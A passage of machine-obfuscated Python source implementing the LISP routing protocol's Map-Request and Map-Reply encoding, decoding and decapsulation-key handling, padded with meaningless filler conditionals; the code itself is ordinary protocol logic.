if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
if ( iiI ) :
Oo00oo += self . encode_json ( OoOo00OO0o00 )
else :
if ( self . source_eid . instance_id != 0 ) :
Oo00oo += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
Oo00oo += self . source_eid . lcaf_encode_iid ( )
else :
Oo00oo += struct . pack ( "H" , socket . htons ( self . source_eid . afi ) )
Oo00oo += self . source_eid . pack_address ( )
if 93 - 93: ooOoO0o + ooOoO0o
if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
if 32 - 32: Oo0Ooo . O0
if 48 - 48: I1ii11iIi11i % II111iiii + I11i
if 25 - 25: IiII * o0oOOo0O0Ooo / I1IiiI . IiII % II111iiii
if 50 - 50: OoOoOO00 * iII111i
if ( probe_dest ) :
if ( probe_port == 0 ) : probe_port = LISP_DATA_PORT
O0O0 = probe_dest . print_address_no_iid ( ) + ":" + str ( probe_port )
if 59 - 59: I1IiiI * I1IiiI / I11i
if ( O0O0 in lisp_crypto_keys_by_rloc_encap ) :
self . keys = lisp_crypto_keys_by_rloc_encap [ O0O0 ]
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: iII111i + I1ii11iIi11i . Ii1I
if 50 - 50: Oo0Ooo
if 16 - 16: Ii1I - OoOoOO00 % Oo0Ooo / Ii1I . I11i + ooOoO0o
if 78 - 78: iIii1I11I1II1 + OoO0O00 + i11iIiiIii
if 21 - 21: Oo0Ooo + Ii1I % ooOoO0o + OoOoOO00 % I11i
if 22 - 22: i1IIi / OoooooooOO . OoO0O00
for oO0oO00OO00 in self . itr_rlocs :
if ( lisp_data_plane_security and self . itr_rlocs . index ( oO0oO00OO00 ) == 0 ) :
if ( self . keys == None or self . keys [ 1 ] == None ) :
iI1iiiiiii = lisp_keys ( 1 )
self . keys = [ None , iI1iiiiiii , None , None ]
if 83 - 83: I1IiiI - OoooooooOO + I1ii11iIi11i . Ii1I / o0oOOo0O0Ooo + ooOoO0o
iI1iiiiiii = self . keys [ 1 ]
iI1iiiiiii . add_key_by_nonce ( self . nonce )
Oo00oo += iI1iiiiiii . encode_lcaf ( oO0oO00OO00 )
else :
Oo00oo += struct . pack ( "H" , socket . htons ( oO0oO00OO00 . afi ) )
Oo00oo += oO0oO00OO00 . pack_address ( )
if 90 - 90: I1IiiI - i11iIiiIii
if 42 - 42: OOooOOo . Oo0Ooo
if 21 - 21: iII111i . I1IiiI / I11i
if 97 - 97: iIii1I11I1II1 + i1IIi - o0oOOo0O0Ooo
if 73 - 73: OoO0O00 - i11iIiiIii % I1Ii111 / Oo0Ooo - OoooooooOO % OOooOOo
if 79 - 79: I1IiiI / o0oOOo0O0Ooo . Ii1I * I1ii11iIi11i + I11i
if ( Ii1i != None ) :
i1 = str ( time . time ( ) )
Ii1i = lisp_encode_telemetry ( Ii1i , io = i1 )
self . json_telemetry = Ii1i
Oo00oo += self . encode_json ( Ii1i )
if 96 - 96: OoO0O00 * II111iiii
if 1 - 1: I1IiiI - OoOoOO00
OOOoOo0o0Ooo = 0 if self . target_eid . is_binary ( ) == False else self . target_eid . mask_len
if 22 - 22: OoOoOO00 * O0 / OoooooooOO
if 95 - 95: iIii1I11I1II1
OOOO0oo0o0O = 0
if ( self . subscribe_bit ) :
OOOO0oo0o0O = 0x80
self . xtr_id_present = True
if ( self . xtr_id == None ) :
self . xtr_id = random . randint ( 0 , ( 2 ** 128 ) - 1 )
if 29 - 29: I1ii11iIi11i + OoooooooOO . OoO0O00 . i1IIi - OoooooooOO * i11iIiiIii
if 19 - 19: I1ii11iIi11i * O0 - ooOoO0o
if 27 - 27: iII111i / o0oOOo0O0Ooo . OoOoOO00 * Ii1I * I1Ii111
iiII1iiI = "BB"
Oo00oo += struct . pack ( iiII1iiI , OOOO0oo0o0O , OOOoOo0o0Ooo )
if 81 - 81: I1Ii111
if ( self . target_group . is_null ( ) == False ) :
Oo00oo += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
Oo00oo += self . target_eid . lcaf_encode_sg ( self . target_group )
elif ( self . target_eid . instance_id != 0 or
self . target_eid . is_geo_prefix ( ) ) :
Oo00oo += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
Oo00oo += self . target_eid . lcaf_encode_iid ( )
else :
Oo00oo += struct . pack ( "H" , socket . htons ( self . target_eid . afi ) )
Oo00oo += self . target_eid . pack_address ( )
if 45 - 45: OOooOOo * II111iiii * OoooooooOO / OoooooooOO * I1Ii111
if 38 - 38: iII111i . OoooooooOO
if 28 - 28: I1Ii111 * i1IIi . I1ii11iIi11i
if 75 - 75: O0 / oO0o * ooOoO0o - OOooOOo / i1IIi
if 61 - 61: I11i
if ( self . subscribe_bit ) : Oo00oo = self . encode_xtr_id ( Oo00oo )
return ( Oo00oo )
if 100 - 100: O0 - iIii1I11I1II1 * Oo0Ooo
if 35 - 35: ooOoO0o
def lcaf_decode_json ( self , packet ) :
iiII1iiI = "BBBBHH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 57 - 57: OoO0O00 . Oo0Ooo + I1IiiI
Ii1Ii1Ii , Ooo0000o , ooOoOoOo , ii11Ii1111 , iIIIi1Iii1 , oOoOOOo0oo = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 89 - 89: II111iiii . I1ii11iIi11i
if 4 - 4: I1IiiI * OoooooooOO
if ( ooOoOoOo != LISP_LCAF_JSON_TYPE ) : return ( packet )
if 21 - 21: OoooooooOO
if 36 - 36: iII111i
if 91 - 91: ooOoO0o + IiII . I1IiiI / I11i / IiII
if 23 - 23: I1ii11iIi11i - OOooOOo - i1IIi
iIIIi1Iii1 = socket . ntohs ( iIIIi1Iii1 )
oOoOOOo0oo = socket . ntohs ( oOoOOOo0oo )
packet = packet [ ooo0000oo0 : : ]
if ( len ( packet ) < iIIIi1Iii1 ) : return ( None )
if ( iIIIi1Iii1 != oOoOOOo0oo + 4 ) : return ( None )
if 20 - 20: OoooooooOO / Oo0Ooo * OoO0O00 . o0oOOo0O0Ooo . I1IiiI
if 75 - 75: iIii1I11I1II1 - Ii1I % O0 % IiII
if 6 - 6: Oo0Ooo % oO0o * ooOoO0o - i1IIi . OoOoOO00
if 20 - 20: Oo0Ooo / I1Ii111 . Oo0Ooo
OoOo00OO0o00 = packet [ 0 : oOoOOOo0oo ]
packet = packet [ oOoOOOo0oo : : ]
if 60 - 60: I1ii11iIi11i - I1IiiI * O0 * Oo0Ooo . i1IIi . OoOoOO00
if 24 - 24: IiII * I1IiiI / OOooOOo
if 51 - 51: iIii1I11I1II1 / I11i * OoO0O00 * Ii1I + I1ii11iIi11i . OoooooooOO
if 75 - 75: IiII / OoooooooOO / O0 % OOooOOo
if ( lisp_is_json_telemetry ( OoOo00OO0o00 ) != None ) :
self . json_telemetry = OoOo00OO0o00
if 87 - 87: II111iiii / iIii1I11I1II1 % I1ii11iIi11i
if 11 - 11: o0oOOo0O0Ooo * OoO0O00
if 92 - 92: OoOoOO00 . Oo0Ooo * I11i
if 86 - 86: O0
if 55 - 55: Ii1I / I1Ii111 / I1ii11iIi11i % ooOoO0o % I1IiiI
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if ( i1I1iiiI != 0 ) : return ( packet )
if 55 - 55: oO0o + OoooooooOO % i1IIi
if ( self . json_telemetry != None ) : return ( packet )
if 24 - 24: I1ii11iIi11i - Oo0Ooo
if 36 - 36: I1IiiI . OOooOOo % II111iiii * IiII
if 34 - 34: I11i % iII111i - ooOoO0o - I1IiiI
if 44 - 44: Ii1I . o0oOOo0O0Ooo . iIii1I11I1II1 + OoooooooOO - I1IiiI
try :
OoOo00OO0o00 = json . loads ( OoOo00OO0o00 )
except :
return ( None )
if 22 - 22: I11i * I1ii11iIi11i . OoooooooOO / Oo0Ooo / Ii1I
if 54 - 54: I1Ii111 % Ii1I + ooOoO0o
if 45 - 45: Ii1I / oO0o * I1Ii111 . Ii1I
if 25 - 25: I1ii11iIi11i / I1ii11iIi11i
if 79 - 79: Oo0Ooo - OoO0O00 % Oo0Ooo . II111iiii
if ( "source-eid" not in OoOo00OO0o00 ) : return ( packet )
o0Ooo0Oooo0o = OoOo00OO0o00 [ "source-eid" ]
i1I1iiiI = LISP_AFI_IPV4 if o0Ooo0Oooo0o . count ( "." ) == 3 else LISP_AFI_IPV6 if o0Ooo0Oooo0o . count ( ":" ) == 7 else None
if 22 - 22: oO0o / II111iiii . OoOoOO00
if ( i1I1iiiI == None ) :
lprint ( "Bad JSON 'source-eid' value: {}" . format ( o0Ooo0Oooo0o ) )
return ( None )
if 9 - 9: i11iIiiIii + ooOoO0o . iIii1I11I1II1 * OoOoOO00
if 4 - 4: I1Ii111 + iII111i % O0
self . source_eid . afi = i1I1iiiI
self . source_eid . store_address ( o0Ooo0Oooo0o )
if 98 - 98: i1IIi + I1Ii111 - I1ii11iIi11i . OoooooooOO / O0 / iII111i
if ( "signature-eid" not in OoOo00OO0o00 ) : return ( packet )
o0Ooo0Oooo0o = OoOo00OO0o00 [ "signature-eid" ]
if ( o0Ooo0Oooo0o . count ( ":" ) != 7 ) :
lprint ( "Bad JSON 'signature-eid' value: {}" . format ( o0Ooo0Oooo0o ) )
return ( None )
if 66 - 66: i1IIi % OoooooooOO * i11iIiiIii + oO0o * O0 / OoO0O00
if 14 - 14: I1IiiI . IiII
self . signature_eid . afi = LISP_AFI_IPV6
self . signature_eid . store_address ( o0Ooo0Oooo0o )
if 29 - 29: OoooooooOO / IiII + OoOoOO00 - I1Ii111 + IiII . i1IIi
if ( "signature" not in OoOo00OO0o00 ) : return ( packet )
O0OoO0ooOoo = binascii . a2b_base64 ( OoOo00OO0o00 [ "signature" ] )
self . map_request_signature = O0OoO0ooOoo
return ( packet )
if 26 - 26: i11iIiiIii - II111iiii
if 43 - 43: I1IiiI
def decode ( self , packet , source , port ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 35 - 35: ooOoO0o + OoOoOO00 * OoooooooOO - II111iiii
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = iIiIii [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if 19 - 19: i1IIi / Ii1I / OoOoOO00 . I1IiiI / Ii1I % o0oOOo0O0Ooo
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 39 - 39: ooOoO0o - OoooooooOO
o0Oo0o = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
packet = packet [ ooo0000oo0 : : ]
if 88 - 88: i1IIi + iIii1I11I1II1 * i11iIiiIii - OoooooooOO % o0oOOo0O0Ooo
iIiIii = socket . ntohl ( iIiIii )
self . auth_bit = True if ( iIiIii & 0x08000000 ) else False
self . map_data_present = True if ( iIiIii & 0x04000000 ) else False
self . rloc_probe = True if ( iIiIii & 0x02000000 ) else False
self . smr_bit = True if ( iIiIii & 0x01000000 ) else False
self . pitr_bit = True if ( iIiIii & 0x00800000 ) else False
self . smr_invoked_bit = True if ( iIiIii & 0x00400000 ) else False
self . mobile_node = True if ( iIiIii & 0x00200000 ) else False
self . xtr_id_present = True if ( iIiIii & 0x00100000 ) else False
self . local_xtr = True if ( iIiIii & 0x00004000 ) else False
self . dont_reply_bit = True if ( iIiIii & 0x00002000 ) else False
self . itr_rloc_count = ( ( iIiIii >> 8 ) & 0x1f )
self . record_count = iIiIii & 0xff
self . nonce = o0Oo0o [ 0 ]
if 74 - 74: ooOoO0o - i11iIiiIii
if 34 - 34: IiII + I1Ii111 + Oo0Ooo / II111iiii
if 33 - 33: Ii1I . i1IIi - II111iiii - OoO0O00
if 31 - 31: I11i - OoOoOO00 / o0oOOo0O0Ooo * OoOoOO00 / Oo0Ooo + o0oOOo0O0Ooo
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( packet ) == False ) : return ( None )
if 46 - 46: IiII * OoO0O00 / OOooOOo + Oo0Ooo
if 24 - 24: ooOoO0o % OOooOOo . O0 * Oo0Ooo
ooo0000oo0 = struct . calcsize ( "H" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 52 - 52: O0 . I1Ii111 + iII111i / i11iIiiIii
i1I1iiiI = struct . unpack ( "H" , packet [ : ooo0000oo0 ] )
self . source_eid . afi = socket . ntohs ( i1I1iiiI [ 0 ] )
packet = packet [ ooo0000oo0 : : ]
if 52 - 52: oO0o % Oo0Ooo * II111iiii
if ( self . source_eid . afi == LISP_AFI_LCAF ) :
ii1iiiIIiIII = packet
packet = self . source_eid . lcaf_decode_iid ( packet )
if ( packet == None ) :
packet = self . lcaf_decode_json ( ii1iiiIIiIII )
if ( packet == None ) : return ( None )
if 3 - 3: IiII % I1Ii111 . OoooooooOO
elif ( self . source_eid . afi != LISP_AFI_NONE ) :
packet = self . source_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 19 - 19: I1Ii111 * Ii1I - oO0o
self . source_eid . mask_len = self . source_eid . host_mask_len ( )
if 78 - 78: OoO0O00 - Ii1I / OOooOOo
ooOo000 = ( os . getenv ( "LISP_NO_CRYPTO" ) != None )
self . itr_rlocs = [ ]
OO0o0oo = self . itr_rloc_count + 1
if 68 - 68: iII111i . OOooOOo
while ( OO0o0oo != 0 ) :
ooo0000oo0 = struct . calcsize ( "H" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 6 - 6: Ii1I - o0oOOo0O0Ooo % I11i + i11iIiiIii
i1I1iiiI = socket . ntohs ( struct . unpack ( "H" , packet [ : ooo0000oo0 ] ) [ 0 ] )
oO0oO00OO00 = lisp_address ( LISP_AFI_NONE , "" , 32 , 0 )
oO0oO00OO00 . afi = i1I1iiiI
if 40 - 40: O0 . Ii1I
if 58 - 58: i11iIiiIii * iII111i / Ii1I - oO0o - I1ii11iIi11i % o0oOOo0O0Ooo
if 16 - 16: OoooooooOO
if 71 - 71: Ii1I % O0 / I1Ii111 % iII111i - II111iiii / OoO0O00
if 30 - 30: I11i
if ( oO0oO00OO00 . afi == LISP_AFI_LCAF ) :
i1o0o0oOO = packet
O0o00o0Oo = packet [ ooo0000oo0 : : ]
packet = self . lcaf_decode_json ( O0o00o0Oo )
if ( packet == None ) : return ( None )
if ( packet == O0o00o0Oo ) : packet = i1o0o0oOO
if 29 - 29: OoO0O00 - Oo0Ooo . oO0o / OoO0O00 % i11iIiiIii
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
if 64 - 64: i1IIi / IiII . IiII - I1Ii111 % OOooOOo . II111iiii
if 78 - 78: I1Ii111 - O0 - I1Ii111 . iIii1I11I1II1 % I1ii11iIi11i . OoooooooOO
if 64 - 64: IiII
if ( oO0oO00OO00 . afi != LISP_AFI_LCAF ) :
if ( len ( packet ) < oO0oO00OO00 . addr_length ( ) ) : return ( None )
packet = oO0oO00OO00 . unpack_address ( packet [ ooo0000oo0 : : ] )
if ( packet == None ) : return ( None )
if 21 - 21: o0oOOo0O0Ooo - ooOoO0o * OoooooooOO . OoooooooOO
if ( ooOo000 ) :
self . itr_rlocs . append ( oO0oO00OO00 )
OO0o0oo -= 1
continue
if 17 - 17: OOooOOo - iII111i % I1IiiI * OOooOOo * iIii1I11I1II1 . o0oOOo0O0Ooo
if 58 - 58: oO0o - II111iiii + O0
O0O0 = lisp_build_crypto_decap_lookup_key ( oO0oO00OO00 , port )
if 54 - 54: iIii1I11I1II1 - IiII - IiII
if 18 - 18: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii
if 63 - 63: iII111i - OoO0O00 * OOooOOo
if 89 - 89: iII111i / Oo0Ooo
if 66 - 66: o0oOOo0O0Ooo + OoOoOO00 % OoooooooOO . I11i
if ( lisp_nat_traversal and oO0oO00OO00 . is_private_address ( ) and source ) : oO0oO00OO00 = source
if 30 - 30: II111iiii - Oo0Ooo - i11iIiiIii + O0
Ooo0OO0 = lisp_crypto_keys_by_rloc_decap
if ( O0O0 in Ooo0OO0 ) : Ooo0OO0 . pop ( O0O0 )
if 71 - 71: Ii1I + i11iIiiIii
if 92 - 92: iIii1I11I1II1 + Ii1I
if 69 - 69: Oo0Ooo
if 70 - 70: O0 - OoO0O00 - Oo0Ooo
if 95 - 95: IiII * II111iiii % o0oOOo0O0Ooo * Oo0Ooo . I11i
if 46 - 46: II111iiii - OoO0O00 % ooOoO0o
lisp_write_ipc_decap_key ( O0O0 , None )
if 97 - 97: OoO0O00 . OoOoOO00
elif ( self . json_telemetry == None ) :
if 78 - 78: I1ii11iIi11i + I1ii11iIi11i . OoOoOO00 - IiII * iIii1I11I1II1 * O0
if 26 - 26: OoooooooOO + oO0o + OoO0O00 . O0
if 46 - 46: OoooooooOO - Oo0Ooo * I1Ii111 * OOooOOo * I1Ii111 . oO0o
if 96 - 96: Ii1I / IiII % o0oOOo0O0Ooo + I11i
i1o0o0oOO = packet
iIiiIi1111ii = lisp_keys ( 1 )
packet = iIiiIi1111ii . decode_lcaf ( i1o0o0oOO , 0 )
if 53 - 53: O0 % ooOoO0o
if ( packet == None ) : return ( None )
if 41 - 41: IiII
if 29 - 29: ooOoO0o
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
if 22 - 22: i1IIi
OoOO0Ooo = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM ,
LISP_CS_25519_CHACHA ]
if ( iIiiIi1111ii . cipher_suite in OoOO0Ooo ) :
if ( iIiiIi1111ii . cipher_suite == LISP_CS_25519_CBC or
iIiiIi1111ii . cipher_suite == LISP_CS_25519_GCM ) :
III = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
if ( iIiiIi1111ii . cipher_suite == LISP_CS_25519_CHACHA ) :
III = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
else :
III = lisp_keys ( 1 , do_poly = False , do_curve = False ,
do_chacha = False )
if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
packet = III . decode_lcaf ( i1o0o0oOO , 0 )
if ( packet == None ) : return ( None )
if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
i1I1iiiI = struct . unpack ( "H" , packet [ : ooo0000oo0 ] ) [ 0 ]
oO0oO00OO00 . afi = socket . ntohs ( i1I1iiiI )
if ( len ( packet ) < oO0oO00OO00 . addr_length ( ) ) : return ( None )
if 88 - 88: OOooOOo
packet = oO0oO00OO00 . unpack_address ( packet [ ooo0000oo0 : : ] )
if ( packet == None ) : return ( None )
if 25 - 25: OoO0O00 + o0oOOo0O0Ooo . ooOoO0o - Ii1I . oO0o * Ii1I
if ( ooOo000 ) :
self . itr_rlocs . append ( oO0oO00OO00 )
OO0o0oo -= 1
continue
if 85 - 85: i1IIi
if 94 - 94: OoooooooOO . O0 / OoooooooOO
O0O0 = lisp_build_crypto_decap_lookup_key ( oO0oO00OO00 , port )
if 67 - 67: i11iIiiIii + OoOoOO00
I1 = None
if ( lisp_nat_traversal and oO0oO00OO00 . is_private_address ( ) and source ) : oO0oO00OO00 = source
if 35 - 35: I1ii11iIi11i . OOooOOo
if 97 - 97: I1IiiI
if ( O0O0 in lisp_crypto_keys_by_rloc_decap ) :
iI1iiiiiii = lisp_crypto_keys_by_rloc_decap [ O0O0 ]
I1 = iI1iiiiiii [ 1 ] if iI1iiiiiii and iI1iiiiiii [ 1 ] else None
if 63 - 63: O0 - OoOoOO00 / i11iIiiIii / OoooooooOO / ooOoO0o / II111iiii
if 45 - 45: II111iiii . OoO0O00 + OoO0O00 * iIii1I11I1II1
I11Ii1I1I1111 = True
if ( I1 ) :
if ( I1 . compare_keys ( III ) ) :
self . keys = [ None , I1 , None , None ]
lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( O0O0 , False ) ) )
if 9 - 9: OoooooooOO * I1IiiI - Oo0Ooo / i11iIiiIii * iII111i
else :
I11Ii1I1I1111 = False
oO = bold ( "Remote decap-rekeying" , False )
lprint ( "{} for RLOC {}" . format ( oO , red ( O0O0 ,
False ) ) )
III . copy_keypair ( I1 )
III . uptime = I1 . uptime
I1 = None
if 75 - 75: I1IiiI % II111iiii * oO0o % i1IIi % OOooOOo
if 93 - 93: OoOoOO00
if 48 - 48: i11iIiiIii
if ( I1 == None ) :
self . keys = [ None , III , None , None ]
if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
III . local_public_key = None
lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
False ) , red ( O0O0 , False ) ) )
elif ( III . remote_public_key != None ) :
if ( I11Ii1I1I1111 ) :
lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
# i11iIiiIii % I1IiiI
red ( O0O0 , False ) ) )
if 90 - 90: II111iiii
III . compute_shared_key ( "decap" )
III . add_key_by_rloc ( O0O0 , False )
if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
if 71 - 71: i1IIi / I11i
self . itr_rlocs . append ( oO0oO00OO00 )
OO0o0oo -= 1
if 14 - 14: OoooooooOO
if 99 - 99: o0oOOo0O0Ooo * o0oOOo0O0Ooo
ooo0000oo0 = struct . calcsize ( "BBH" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 6 - 6: i11iIiiIii + oO0o % ooOoO0o + i11iIiiIii - OOooOOo
OOOO0oo0o0O , OOOoOo0o0Ooo , i1I1iiiI = struct . unpack ( "BBH" , packet [ : ooo0000oo0 ] )
self . subscribe_bit = ( OOOO0oo0o0O & 0x80 )
self . target_eid . afi = socket . ntohs ( i1I1iiiI )
packet = packet [ ooo0000oo0 : : ]
if 12 - 12: iII111i . oO0o % IiII * OoooooooOO . IiII
self . target_eid . mask_len = OOOoOo0o0Ooo
if ( self . target_eid . afi == LISP_AFI_LCAF ) :
packet , iIi = self . target_eid . lcaf_decode_eid ( packet )
if ( packet == None ) : return ( None )
if ( iIi ) : self . target_group = iIi
else :
packet = self . target_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = packet [ ooo0000oo0 : : ]
if 34 - 34: OoooooooOO
return ( packet )
if 40 - 40: I1ii11iIi11i . OoO0O00
if 30 - 30: ooOoO0o % I1IiiI . oO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . target_eid , self . target_group ) )
if 48 - 48: OoOoOO00
if 28 - 28: I11i / O0 * IiII - I1Ii111 % IiII
def encode_xtr_id ( self , packet ) :
iiii = self . xtr_id >> 64
Oo000O00o0O = self . xtr_id & 0xffffffffffffffff
iiii = byte_swap_64 ( iiii )
Oo000O00o0O = byte_swap_64 ( Oo000O00o0O )
packet += struct . pack ( "QQ" , iiii , Oo000O00o0O )
return ( packet )
if 8 - 8: I11i / I1ii11iIi11i % I1ii11iIi11i % Ii1I + iII111i
if 100 - 100: OoO0O00
def decode_xtr_id ( self , packet ) :
ooo0000oo0 = struct . calcsize ( "QQ" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
packet = packet [ len ( packet ) - ooo0000oo0 : : ]
iiii , Oo000O00o0O = struct . unpack ( "QQ" , packet [ : ooo0000oo0 ] )
iiii = byte_swap_64 ( iiii )
Oo000O00o0O = byte_swap_64 ( Oo000O00o0O )
self . xtr_id = ( iiii << 64 ) | Oo000O00o0O
return ( True )
if 25 - 25: I1Ii111 - ooOoO0o + Oo0Ooo . I1IiiI % iIii1I11I1II1
if 49 - 49: i1IIi + OoO0O00 + iII111i / Oo0Ooo
if 5 - 5: i11iIiiIii + I11i . IiII
if 9 - 9: i11iIiiIii / iIii1I11I1II1 - I1ii11iIi11i * I1ii11iIi11i
if 99 - 99: I11i
if 64 - 64: iIii1I11I1II1
if 61 - 61: Ii1I % Oo0Ooo + OoOoOO00
if 60 - 60: oO0o . OoooooooOO
if 40 - 40: I11i
if 44 - 44: ooOoO0o
if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
if 97 - 97: I1IiiI / o0oOOo0O0Ooo
if 13 - 13: I1ii11iIi11i
if 72 - 72: Oo0Ooo + IiII / Ii1I * Oo0Ooo
if 41 - 41: OOooOOo - OoOoOO00 . I1IiiI + i11iIiiIii + OoO0O00 * iII111i
if 85 - 85: OoO0O00 + II111iiii
if 87 - 87: OoO0O00
if 93 - 93: OoooooooOO
if 80 - 80: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii / OOooOOo + oO0o
if 10 - 10: OoO0O00 . OoO0O00 + O0
if 13 - 13: i1IIi . I1IiiI
if 45 - 45: ooOoO0o % I11i
if 37 - 37: iII111i
if 70 - 70: O0 + iIii1I11I1II1 % O0 * o0oOOo0O0Ooo - Oo0Ooo - ooOoO0o
if 94 - 94: i1IIi + IiII / OoooooooOO - oO0o / OOooOOo / OoOoOO00
if 55 - 55: OOooOOo
if 5 - 5: I11i / OoOoOO00
if 48 - 48: i1IIi - oO0o . OoooooooOO - OoO0O00 - i1IIi
if 19 - 19: oO0o % Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
class lisp_map_reply ( object ) :
def __init__ ( self ) :
self . rloc_probe = False
self . echo_nonce_capable = False
self . security = False
self . record_count = 0
self . hop_count = 0
self . nonce = 0
self . keys = None
if 62 - 62: o0oOOo0O0Ooo % II111iiii
if 22 - 22: oO0o - o0oOOo0O0Ooo
def print_map_reply ( self ) :
IiiiI1 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
if 89 - 89: OOooOOo
lprint ( IiiiI1 . format ( bold ( "Map-Reply" , False ) , "R" if self . rloc_probe else "r" ,
# O0 / iII111i
"E" if self . echo_nonce_capable else "e" ,
"S" if self . security else "s" , self . hop_count , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
if 70 - 70: Oo0Ooo
if 92 - 92: OOooOOo + i1IIi - ooOoO0o
def encode ( self ) :
iIiIii = ( LISP_MAP_REPLY << 28 ) | self . record_count
iIiIii |= self . hop_count << 8
if ( self . rloc_probe ) : iIiIii |= 0x08000000
if ( self . echo_nonce_capable ) : iIiIii |= 0x04000000
if ( self . security ) : iIiIii |= 0x02000000
if 13 - 13: iII111i
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "Q" , self . nonce )
return ( Oo00oo )
if 79 - 79: OoooooooOO / OoO0O00 % Ii1I - OoOoOO00 * i1IIi + I1Ii111
if 42 - 42: i11iIiiIii % I1Ii111 + i11iIiiIii % i11iIiiIii % I1ii11iIi11i
def decode ( self , packet ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 6 - 6: oO0o . o0oOOo0O0Ooo / I1IiiI
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = iIiIii [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if 64 - 64: iII111i
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 65 - 65: O0 / II111iiii * IiII % Ii1I + o0oOOo0O0Ooo
o0Oo0o = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
packet = packet [ ooo0000oo0 : : ]
if 43 - 43: I1Ii111 + OoO0O00 * OoooooooOO
iIiIii = socket . ntohl ( iIiIii )
self . rloc_probe = True if ( iIiIii & 0x08000000 ) else False
self . echo_nonce_capable = True if ( iIiIii & 0x04000000 ) else False
self . security = True if ( iIiIii & 0x02000000 ) else False
self . hop_count = ( iIiIii >> 8 ) & 0xff
self . record_count = iIiIii & 0xff
self . nonce = o0Oo0o [ 0 ]
if 85 - 85: iII111i + OOooOOo
if ( self . nonce in lisp_crypto_keys_by_nonce ) :
self . keys = lisp_crypto_keys_by_nonce [ self . nonce ]
self . keys [ 1 ] . delete_key_by_nonce ( self . nonce )
if 36 - 36: OoO0O00 % II111iiii * O0 + II111iiii - oO0o - i1IIi
return ( packet )
if 53 - 53: Ii1I - OOooOOo
if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
if 87 - 87: i1IIi % Ii1I % i1IIi + iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 * I11i . I1Ii111 - o0oOOo0O0Ooo
if 66 - 66: I1IiiI * I1Ii111 / i11iIiiIii / OOooOOo
if 19 - 19: ooOoO0o % iIii1I11I1II1 * OoooooooOO
if 60 - 60: I1Ii111 * iII111i / OoooooooOO * Oo0Ooo
if 47 - 47: iII111i + o0oOOo0O0Ooo % iIii1I11I1II1 * OoOoOO00
